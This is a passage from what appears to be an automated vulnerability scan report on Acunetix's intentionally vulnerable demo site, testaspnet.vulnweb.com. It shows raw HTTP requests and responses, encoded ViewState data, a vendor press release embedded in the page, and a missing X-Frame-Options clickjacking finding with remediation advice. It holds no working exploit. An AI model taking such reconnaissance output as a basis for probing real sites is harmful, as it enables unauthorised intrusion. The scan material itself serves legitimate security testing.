ZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKP1p3RBAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/M3rUCxcfpdy3AdSqGMGh3aLpuYg==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        11. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30393
          
          
          Response body (30393 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaX